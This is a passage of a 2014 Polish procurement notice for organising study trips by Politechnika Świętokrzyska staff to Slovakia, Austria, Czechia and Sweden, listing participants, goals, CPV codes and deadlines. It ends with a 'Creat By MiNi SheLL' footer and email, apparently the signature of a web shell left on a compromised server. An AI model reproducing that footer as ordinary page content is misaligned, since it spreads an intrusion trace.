LICZBA UCZESTNIKÓW/PROFIL: W wyjeździe uczestniczyć będzie 5 osób dorosłych. W skład delegacji wejdą pracownicy naukowo - dydaktyczni Wydziału Zarządzania 
i Modelowania Komputerowego Politechniki Świętokrzyskiej w Kielcach.
CEL WYJAZDU: Celem wyjazdu jest transfer wiedzy teoretycznej i empirycznej w zakresie rozwoju i komercjalizacji inteligentnych technologii z uwzględnieniem aspektów projakościowych i proekologicznych. Planowane efekty wyjazdu to:
- zapoznanie się z praktycznymi aspektami funkcjonowania mechanizmów transferu wiedzy;
- zapoznanie się z aktualnymi kierunkami badań, rozwoju 
i komercjalizacji w zakresie technologii szybkiego prototypowania;
- zapoznanie się z metodycznymi i praktycznymi aspektami środowiskowymi inżynierii produkcji w odniesieniu do oceny cyklu życia produktów;
- zapoznanie się z technologicznymi i implementacyjnymi aspektami rozwoju infrastruktury i usług społeczeństwa informacyjnego w obszarze przetwarzania w chmurze;
- zapoznanie się z działalnością certyfikacyjną w zakresie spełnienia standardów jakości;
- identyfikacja potencjalnych obszarów współpracy i możliwości partnerstwa w odniesieniu do projektów rozwojowych w perspektywie 2014 - 2020.
Szczegółowy Opis Przedmiotu Zamówienia zamieszczony zostal w Specyfikacji Istotnych Warunkow Zamówienia Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.99.70.00-9, 63.51.50.00-2, 79.95.10.00-5, 55.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przedmiot zamówienia obejmuje kompleksową organizację wyjazdu studyjnego: Słowacja - Austria - Czechy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> TEMAT WYJAZDU: Intensyfikacja międzynarodowej współpracy naukowej i wymiany studentów w obszarze zrównoważonego transportu i logistyki
TERMIN REALIZACJI: Wrzesień/październik 2014 r. (termin do uzgodnienia z Zamawiającym na etapie realizacji usługi).
MIEJSCE: Bratysława (Słowacja) - Wiedeń (Austria) - Brno (Republika Czeska) - Praga (Republika Czeska)
LICZBA UCZESTNIKÓW/PROFIL: W wyjeździe uczestniczyć będzie 8 osób dorosłych. W skład delegacji wejdą pracownicy naukowo - dydaktyczni Politechniki Świętokrzyskiej w Kielcach.
CEL WYJAZDU: Realizacja wyjazdu studyjnego związana jest z kluczowymi branżami rozwoju, w tym zrównoważonym rozwojem energetycznym i ICT, branżami ściśle współpracującymi z rozwojem ekologicznym transportu. Celem wyjazdu studyjnego jest:
- zapoznanie z profilem kształcenia i profilem badawczym odwiedzanych instytucji;
- zapoznanie się z możliwościami w zakresie współpracy przy realizacji wspólnych projektów badawczych;
- utworzenie sieci współpracy ukierunkowanej na zagadnienia rozwoju w odniesieniu do ekologicznego transportu.
Szczegółowy Opis Przedmiotu Zamówienia zamieszczony został w Specyfikacji Istotnych Warunków Zamówienia Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.99.70.00-9, 63.51.50.00-2, 79.95.10.00-5, 55.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przedmiot zamówienia obejmuje kompleksową organizację wyjazdu studyjnego do Szwecji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> TEMAT WYJAZDU: Energooszczędne budownictwo przyjazne dla środowiska - szansa na zdobycie przewagi konkurencyjnej
TERMIN REALIZACJI: Wrzesień 2014 r. (termin do uzgodnienia z Zamawiającym na etapie realizacji usługi). 
MIEJSCE: Szwecja/Sztokholm, Uppsala
LICZBA UCZESTNIKÓW/PROFIL: W wyjeździe uczestniczyć będzie 7 osób dorosłych. 
W skład delegacji wejdą pracownicy następujących Instytucji:
- Przedstawiciel Zarządu Województwa Świętokrzyskiego (1 osoba);
- Kadra kierownicza Biura Innowacji Urzędu Marszałkowskiego (1 osoba);
- Przedstawiciel Politechniki Świętokrzyskiej (1 osoba);
- Przedstawiciel Staropolskiej Izby Przemysłowo - Handlowej (1 osoba);
- Reprezentant Zespołu Szkół Zawodowych nr 1 w Kielcach (1 osoba);
- Przedsiębiorca z branży budowlanej (2 osoby).
CEL WYJAZDU: Celem wyjazdu jest zdobycie wiedzy na temat najnowszych rozwiązań naukowo - technologicznych w branży energooszczędnego budownictwa. 
Szczegółowy Opis Przedmiotu Zamówienia zamieszczony został w Specyfikacji Istotnych warunków Zamówienia Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.99.70.00-9, 63.51.50.00-2, 79.95.10.00-5, 55.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com